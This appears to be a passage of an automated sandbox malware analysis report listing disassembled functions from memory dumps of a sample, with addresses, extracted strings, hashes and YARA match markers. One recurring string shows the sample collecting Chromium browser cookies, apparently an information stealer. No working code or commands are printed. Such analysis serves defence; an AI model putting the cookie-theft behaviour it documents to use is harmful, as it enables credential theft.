Opcode ID: 413a8c3097bd0bbed46b622d8ebfbae3443f36cf74166f8203eafa5a1eed2870
Instruction ID: ba5ada93d08f8b839c155c924be18bd2388ce64a3bb76f2220dcd3b2ca331741
Opcode Fuzzy Hash: 413a8c3097bd0bbed46b622d8ebfbae3443f36cf74166f8203eafa5a1eed2870
Instruction Fuzzy Hash: F852AD70204B408FE725CF29C4A47A2BBE2BF56304F548A5DD4DB8BB85C779B409CB95

Function 0043B050 Relevance: 4.1, Strings: 3, Instructions: 343COMMON

Download Yara Rule

Strings

' !", xrefs: 0043B0A8
R-,T, xrefs: 0043B0F0
R-,T, xrefs: 0043B1F0

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: ' !"$R-,T$R-,T
API String ID: 0-1082949730
Opcode ID: 12a2087d3b15462c3a795410a93c0e95ed4662567ffc1f9d7804db59659b131b
Instruction ID: 9bdbef18e09c284a1484a8fdec6c79e1bfd0a8a4d41465c41f0146dce1d37148
Opcode Fuzzy Hash: 12a2087d3b15462c3a795410a93c0e95ed4662567ffc1f9d7804db59659b131b
Instruction Fuzzy Hash: 19B1BD75A083118BC724CF18C49076BB7E2FF88354F19866DE9995B391DB38EC11CB9A

Function 0064B2B7 Relevance: 4.1, Strings: 3, Instructions: 343COMMON

Download Yara Rule

Strings

R-,T, xrefs: 0064B357
R-,T, xrefs: 0064B457
' !", xrefs: 0064B30F

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: ' !"$R-,T$R-,T
API String ID: 0-1082949730
Opcode ID: a0d8ec2e41ee8f33b9d3bae5825d1913e48ad55aa89737e13fc6d60f7e4d6ede
Instruction ID: 55e703b342213589ff6135a7b51edd23c833594815d310e4e41331251b9a82ec
Opcode Fuzzy Hash: a0d8ec2e41ee8f33b9d3bae5825d1913e48ad55aa89737e13fc6d60f7e4d6ede
Instruction Fuzzy Hash: F1B1D071A083118BC718CF18C490AAFB7E2FF88754F199A6CE8995B361DB35EC11CB95

Function 00405440 Relevance: 3.4, Strings: 2, Instructions: 858COMMON

Download Yara Rule

Strings

0, xrefs: 00405E2D
8, xrefs: 00405E25

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: a65c4e76ea57bbfc46f0087fecdd1749cb0d7a49674b239ba6b424def3ae107b
Instruction ID: dc0667dd8dba82da45780d667ad4d2091edccb94f5c689a9349702639bf5c4e6
Opcode Fuzzy Hash: a65c4e76ea57bbfc46f0087fecdd1749cb0d7a49674b239ba6b424def3ae107b
Instruction Fuzzy Hash: CF8213716087419FD720CF28C884B9BBBE1EF88314F44892EE989A7391D379D954CF96

Function 006156A7 Relevance: 3.4, Strings: 2, Instructions: 858COMMON

Download Yara Rule

Strings

0, xrefs: 00616094
8, xrefs: 0061608C

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: 0$8
API String ID: 0-46163386
Opcode ID: 046fdc3f4dc3473bab3f86822898e036eb9f245eac020c489728bed56faa6f3a
Instruction ID: 6a3ac073c85ec347d37152ec092d468eb86c367b1163da52478875dfefd510eb
Opcode Fuzzy Hash: 046fdc3f4dc3473bab3f86822898e036eb9f245eac020c489728bed56faa6f3a
Instruction Fuzzy Hash: 0C822371608741DFD720CF28C89479ABBE2AF88314F08892DF99A87391D375D995CB92

Function 00424B80 Relevance: 3.1, Strings: 2, Instructions: 561COMMON

Download Yara Rule

Strings

", xrefs: 00425095
", xrefs: 00425028

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: "$"
API String ID: 0-3758156766
Opcode ID: b98dada69d51fc25d54d09ae8fa78171f5f64f79720f4369853665ea9e9e0e52
Instruction ID: 4536deac87be68b66e6b1169164205a16b20366d1629798eb3173c915dafa2c3
Opcode Fuzzy Hash: b98dada69d51fc25d54d09ae8fa78171f5f64f79720f4369853665ea9e9e0e52
Instruction Fuzzy Hash: 2502F371B083249BD714CE29E89076BB7D5ABC4314F998A6EE8958B381D738DD048B86

Function 00426174 Relevance: 2.9, Strings: 2, Instructions: 442COMMON

Download Yara Rule

Strings

JlRp, xrefs: 004265C0
7452, xrefs: 004268BC

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: 7452$JlRp
API String ID: 0-1201309010
Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
Instruction ID: 26763a119934df737aef44f96d102629e4e06364a32b506b5a4d198ec9095851
Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
Instruction Fuzzy Hash: C0F19E70205B508FE329CF25D0A43A3BBE1BF56304F95896EC4EB8B785C739A449CB55

Function 006363DB Relevance: 2.9, Strings: 2, Instructions: 442COMMON

Download Yara Rule

Strings

JlRp, xrefs: 00636827
7452, xrefs: 00636B23

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: 7452$JlRp
API String ID: 0-1201309010
Opcode ID: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
Instruction ID: ef5606b1e7e1f7a331c2ffa5fdbb106274a7bb85c0aa76495144f174ab882bb1
Opcode Fuzzy Hash: b1be06b17cb9735fc5b5ba1bd57bf346131fd87671b28f3a724bd065893fc8c0
Instruction Fuzzy Hash: 91F16D70605B418FE329CF25C0A57A3BBE2BF56304F54896DD0EB8B785C779A409CB91

Function 00426284 Relevance: 2.9, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

JlRp, xrefs: 004265C0
7452, xrefs: 004268BC

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: 7452$JlRp
API String ID: 0-1201309010
Opcode ID: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
Instruction ID: 3e43ac3292e75d8b218afd9fd32b7d1e5bc91179cd9b43390289dad712848b02
Opcode Fuzzy Hash: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
Instruction Fuzzy Hash: 02F19E70205B508FE329CF25D0A43A3BBE1BF56304F94896EC4EB8B785CB79A449CB55

Function 006364EB Relevance: 2.9, Strings: 2, Instructions: 440COMMON

Download Yara Rule

Strings

JlRp, xrefs: 00636827
7452, xrefs: 00636B23

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: 7452$JlRp
API String ID: 0-1201309010
Opcode ID: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
Instruction ID: 50ea513edf0f680dd05714bba69374d3c4adea8fdd70f1d9f43589b995c10f73
Opcode Fuzzy Hash: 6516e3fee49e1cdb362f750142c1ae91bd78550dde2a9e9240936d58e0450d02
Instruction Fuzzy Hash: 99F17CB0605B418FE325CF25C0A57A3BBE2BF56304F54896DD0EB8B785C779A409CB91

Function 00614BD7 Relevance: 2.9, Strings: 2, Instructions: 408COMMON

Download Yara Rule

Strings

IEND, xrefs: 00615048
), xrefs: 00614C6F

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 5fae8bd4bad633f51bc3bcaf9a54da298bfdb29abebaaaac5eab5c9fa3e9b1eb
Instruction ID: 4a0e42a54e6db5c642f45d703017367687c2bb332041f75121c9197495259fd2
Opcode Fuzzy Hash: 5fae8bd4bad633f51bc3bcaf9a54da298bfdb29abebaaaac5eab5c9fa3e9b1eb
Instruction Fuzzy Hash: FFE104B2A083449FD714CF28CC8179EBBE2AF94304F18852DF9999B381D775E945CB86

Function 00426271 Relevance: 2.9, Strings: 2, Instructions: 393COMMON

Download Yara Rule

Strings

JlRp, xrefs: 004265C0
7452, xrefs: 004268BC

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: 7452$JlRp
API String ID: 0-1201309010
Opcode ID: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
Instruction ID: 2c0b636c8f7a7c10555f0b16b025c9559032f4b9242e28262834d6f33c4e1acb
Opcode Fuzzy Hash: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
Instruction Fuzzy Hash: 63D19E70205BA08FE325CF24D0A47A3BBE2BF56304F99495DC4EB8B385CB796449CB59

Function 006364D8 Relevance: 2.9, Strings: 2, Instructions: 393COMMON

Download Yara Rule

Strings

JlRp, xrefs: 00636827
7452, xrefs: 00636B23

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: 7452$JlRp
API String ID: 0-1201309010
Opcode ID: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
Instruction ID: e09ff0ecf24800bc37900f934fda338431b4decf98474dfc7cb52c11f144b070
Opcode Fuzzy Hash: f299a0046a17817c6b5238f839191aea79914b0ae4e405eb1ab8f6b677b9bdb4
Instruction Fuzzy Hash: B6D18D70205B908FE3258F25C4A57E3BBE2BF56308F58895DD0EB8B785CB796409CB91

Function 00630AE7 Relevance: 2.9, Strings: 2, Instructions: 390COMMON

Download Yara Rule

Strings

gdeb, xrefs: 00630B3F
]hiX, xrefs: 00630EDB

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: ]hiX$gdeb
API String ID: 0-4273025081
Opcode ID: 3b9d0d01b6c517ed029116daa7ea8e9c6930da06fc9bf245fad038fbe57974c4
Instruction ID: b660b3f35b96a8db969d3d0b239273ef0a6ff55a016d908732b44fd4a35e0bbc
Opcode Fuzzy Hash: 3b9d0d01b6c517ed029116daa7ea8e9c6930da06fc9bf245fad038fbe57974c4
Instruction Fuzzy Hash: 76C1C2716083418FE714CF18C8A176BB7E3EF85314F188A2DE8958B391D779D949CB86

Function 00433D0A Relevance: 2.7, Strings: 2, Instructions: 176COMMON

Download Yara Rule

Strings

gdeb, xrefs: 00433BD6
gdeb, xrefs: 00433B27

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: gdeb$gdeb
API String ID: 0-1883251077
Opcode ID: 9dbd3cb81e7174127b1dcab3a3dfb065f06f2aa3df1185e8255e78e6c6cecfbe
Instruction ID: cf9f2457e42b5478319b54834123ade71b3d153c6120c0fe94c03a58d741c5db
Opcode Fuzzy Hash: 9dbd3cb81e7174127b1dcab3a3dfb065f06f2aa3df1185e8255e78e6c6cecfbe
Instruction Fuzzy Hash: F1513678200B018FD724CF1AC490B27B7E1BB49319F14AA2DD59B8BB62C738F945DB58

Function 00423AD0 Relevance: 2.6, Strings: 2, Instructions: 102COMMON

Download Yara Rule

Strings

gdeb, xrefs: 00423AF1
gdeb, xrefs: 00423996

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: gdeb$gdeb
API String ID: 0-1883251077
Opcode ID: 1669d0a5c4cf9934755a87f65c3a46ab966e49643b3f8f11f2a798d3fc42a453
Instruction ID: e92ea4fe5443a7465b3ee846efb2000115bf1a6242ab2642b3cbd9abe9ffc45f
Opcode Fuzzy Hash: 1669d0a5c4cf9934755a87f65c3a46ab966e49643b3f8f11f2a798d3fc42a453
Instruction Fuzzy Hash: B531E274211B408BD328CF24C5A4727B7F2BF86706F945A1DC4930BF95C778BA469B84

Function 00435EB0 Relevance: 1.9, Strings: 1, Instructions: 607COMMON

Download Yara Rule

Strings

' !", xrefs: 00435F38

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: ' !"
API String ID: 0-2098420348
Opcode ID: 254e8f5f9b43a594ab2737a1670e030025cb17fb895cb5d68ad51d86d26cb4fc
Instruction ID: 55aad70b625533d885964fe9cb24da3c7b8194ed29cb22960a26a8a6f416ebd2
Opcode Fuzzy Hash: 254e8f5f9b43a594ab2737a1670e030025cb17fb895cb5d68ad51d86d26cb4fc
Instruction Fuzzy Hash: C722B1716083119FD714CF18C890B2BFBE1BB89318F198A2EE8D597391C779D905CB9A

Function 00646117 Relevance: 1.9, Strings: 1, Instructions: 607COMMON

Download Yara Rule

Strings

' !", xrefs: 0064619F

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: ' !"
API String ID: 0-2098420348
Opcode ID: 0dfae63bed576ee0d1253da844cde365264208922055f2cef8d634aeb6398677
Instruction ID: ad40fe9233d214b799515cc05376c88220e5fab4737ee7a1d09704516f0bc644
Opcode Fuzzy Hash: 0dfae63bed576ee0d1253da844cde365264208922055f2cef8d634aeb6398677
Instruction Fuzzy Hash: E82290B16083518FD714CF18C890B6BBBE2BB8A318F188A2DF5D49B391C775D905CB96

Function 00611267 Relevance: 1.8, Strings: 1, Instructions: 519COMMON

Download Yara Rule

Strings

, xrefs: 006114DE

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: c08cbb5c55ccd9d82424f4d39c6493db68f5872a21748e94506fb252d9f7405c
Instruction ID: e6c9e3fa629ab16e4d09e940ca45c03387ec52e32aaaedff822934431a9b33f7
Opcode Fuzzy Hash: c08cbb5c55ccd9d82424f4d39c6493db68f5872a21748e94506fb252d9f7405c
Instruction Fuzzy Hash: 1712D5619083959BEB14CE18C4A13EA7BE3AB93350F1CC51EEA958F3D1D23989C5D782

Function 00626B56 Relevance: 1.6, Strings: 1, Instructions: 357COMMON

Download Yara Rule

Strings

IO, xrefs: 00626C0B

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: IO
API String ID: 0-3981347273
Opcode ID: 29857a2e6ba312719b12aca525c2d64ea56232d1874467d3cf7a2838fadab8ac
Instruction ID: 6d237825b20211c9ef3b546a76692fa6d9b7de4e248608b53e5bd6fa7dae3b87
Opcode Fuzzy Hash: 29857a2e6ba312719b12aca525c2d64ea56232d1874467d3cf7a2838fadab8ac
Instruction Fuzzy Hash: 5DD122B1200B018BDB24CF15D591B52BBF2FF4A704F148A9CD89A8FB66D739E845CB84

Function 004164D2 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

v[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 004167B3

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: v[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser
API String ID: 0-3705423304
Opcode ID: 0079c2c751aacdb32043d2065820f57f93782c76d64f3e8a70107f833be3a855
Instruction ID: e2aff65f3d6dc5062d0ba04aa46064ddba6db07fd0ccc2038df325f36c3021e5
Opcode Fuzzy Hash: 0079c2c751aacdb32043d2065820f57f93782c76d64f3e8a70107f833be3a855
Instruction Fuzzy Hash: 9EA18C706057418FD725CF28C1907A3BBE2BF66304F19869DC4964F796D33AE886CB98

Function 00626739 Relevance: 1.5, Strings: 1, Instructions: 290COMMON

Download Yara Rule

Strings

v[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 00626A1A

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: v[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser
API String ID: 0-3705423304
Opcode ID: 105a720d72f04f834a1a897ec32c32aca9f0bc3984781b074275f1dabd6e4c17
Instruction ID: 8ea4bf56e92de2056adc9370f4d175e620e8a216faad9af217d785e834c41354
Opcode Fuzzy Hash: 105a720d72f04f834a1a897ec32c32aca9f0bc3984781b074275f1dabd6e4c17
Instruction Fuzzy Hash: 26A1AFB0605B918FD725CF28D490762BBE2BF66304F18869CD4964FB96C376E846CF90

Function 0043AD30 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

' !", xrefs: 0043AD88

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: ' !"
API String ID: 0-2098420348
Opcode ID: af2c2740d16ebe972ca4115a2762bb663ddf02bb62924408fcf266d741fedccd
Instruction ID: b21458e9d172f3a465188df86c848c015b63d16b5f46d67e3e5fb2f613f60a17
Opcode Fuzzy Hash: af2c2740d16ebe972ca4115a2762bb663ddf02bb62924408fcf266d741fedccd
Instruction Fuzzy Hash: 8391DF746053029BDB28CF19C890B6BB7E2FF88754F18951DE8858B790D738EC61CB96

Function 0064AF97 Relevance: 1.5, Strings: 1, Instructions: 281COMMON

Download Yara Rule

Strings

' !", xrefs: 0064AFEF

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: ' !"
API String ID: 0-2098420348
Opcode ID: debb42a6f6851ee8560725dc3146cc254c2763f71b95a5a01438313c09bd99f7
Instruction ID: 974bbe8c8c0dfd033a6f7a4459c57d1117c448de90601bcaffa88b224f0e9fe4
Opcode Fuzzy Hash: debb42a6f6851ee8560725dc3146cc254c2763f71b95a5a01438313c09bd99f7
Instruction Fuzzy Hash: B3919B706053029BDB18CF18C8A0AABB7E2FF84750F19991CE8858B754DB35ED11CB92

Function 004067B0 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

,, xrefs: 00406903

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
Instruction ID: 49ac68bff1f266d30a48b1e8e6a747f7736882c678fe7bbee82a01b3dca97335
Opcode Fuzzy Hash: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
Instruction Fuzzy Hash: 92B139715093819FD314DF68C84465BBBE0AFA9304F448A6EF49997382C375EA28CB96

Function 00616A17 Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

,, xrefs: 00616B6A

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: ,
API String ID: 0-3772416878
Opcode ID: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
Instruction ID: 46e644fae011f91ccaa5b21effe548bb0c457ace89c9d9e7805668c640d6ba87
Opcode Fuzzy Hash: b66fe1d5329d3e8ed25d87eff139d5ed375f6177f1d56bf6291b259724e3e180
Instruction Fuzzy Hash: 53B13A7160D381AFD314CF68C44469ABFE1AFA9304F484A5DF49897382C771EA58CB96

Function 00436670 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

' !", xrefs: 004368E1

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: ' !"
API String ID: 0-2098420348
Opcode ID: bdaaa64c88ca6c27d57d293b1ce7708b8987770468373f954532dd24f85ec2ff
Instruction ID: f7e06bb7343a789ad0a08b08bc7e5896dfb3b66a2a1c14d4cc0749131caaa646
Opcode Fuzzy Hash: bdaaa64c88ca6c27d57d293b1ce7708b8987770468373f954532dd24f85ec2ff
Instruction Fuzzy Hash: 5281F374A0D2525BC319CF28C49062EFBE2AFD9314F1AD67EE4E54B392C638D805CB56

Function 006468D7 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

' !", xrefs: 00646B48

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: ' !"
API String ID: 0-2098420348
Opcode ID: 2fc314b888fb0116938f773e0c649572fcb4f9e9823d8a26cea8d83fd9cf3a08
Instruction ID: 59c3166802b19b2ead598260d37c8a5b16e3c7c99847c48e8705c24cc57fd8bd
Opcode Fuzzy Hash: 2fc314b888fb0116938f773e0c649572fcb4f9e9823d8a26cea8d83fd9cf3a08
Instruction Fuzzy Hash: 3081BF7160C2928BC719CE29C4D066EFBE2AF96314F18867DF4E58B392C675D846CB42

Function 0041CCD0 Relevance: 1.5, Strings: 1, Instructions: 203COMMON

Download Yara Rule

Strings

7452, xrefs: 0041CEE8

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: 7452
API String ID: 0-87867774
Opcode ID: 5c1e0b948c35acd900ddb97ff7b0f3bedf9caa5bb25f7f18d77543825d300cf8
Instruction ID: 1067625b523eb8300719b926f48d8486b81893701fcfb7bf3f689dc49be56a81
Opcode Fuzzy Hash: 5c1e0b948c35acd900ddb97ff7b0f3bedf9caa5bb25f7f18d77543825d300cf8
Instruction Fuzzy Hash: C251ACB9548301DBE3048F14ED9076BB7E5FB8A318F44496DE98593390D778E840CBAA

Function 00423931 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

gdeb, xrefs: 00423996

Memory Dump Source

Source File: 00000005.00000002.2871070924.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2871070924.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_A247.jbxd

Similarity

API ID:
String ID: gdeb
API String ID: 0-1935535308
Opcode ID: 7a44b362ac63075c833ecc283955e542d92d7f5d633f3448bfc3db36f53db2fa
Instruction ID: d4aa4b60c4f404011ded0bfc51642dd63f19c3ddecb79c10eafa6cd19f5c7a0d
Opcode Fuzzy Hash: 7a44b362ac63075c833ecc283955e542d92d7f5d633f3448bfc3db36f53db2fa
Instruction Fuzzy Hash: E8217AB42156009BD7288F14D5A173B73B2BB86306F94195DD48307F91C779AA829B98

Function 00633B98 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

gdeb, xrefs: 00633BFD

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: gdeb
API String ID: 0-1935535308
Opcode ID: b6e695a08ef51802b35434ef0fb818b6e5709b89da12649de45031fd7ed8f489
Instruction ID: 62b348a4d32c9c8b719d6049963f39935bf8539e1a5e3282d6754661ae42c842
Opcode Fuzzy Hash: b6e695a08ef51802b35434ef0fb818b6e5709b89da12649de45031fd7ed8f489
Instruction Fuzzy Hash: C7215774215B118FD7388F14C8A1B7AB7A3BF91304F58591CE4931BF52C735EA429B94

Function 00632D5B Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

gdeb, xrefs: 00632DBF

Memory Dump Source

Source File: 00000005.00000002.2871336410.0000000000610000.00000040.00001000.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_610000_A247.jbxd

Yara matches

Similarity

API ID:
String ID: gdeb
API String ID: 0-1935535308
Opcode ID: 39845d32d828b44f1a01f395a394bdf9b5f869be6926a6d7d22a8d0d447bb435
Instruction ID: f768263e27e27916d6a9de64d454b7eb78041a0607f7b82ef32b7d7ef7686550
Opcode Fuzzy Hash: 39845d32d828b44f1a01f395a394bdf9b5f869be6926a6d7d22a8d0d447bb435
Instruction Fuzzy Hash: BE2112782083819BD718CF04C5E4AAFB7E2BFC9B04F64991CE8891B751C735DC02AB86

Function 00422AFB Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

gdeb, xrefs: 00422B58

Memory Dump Source

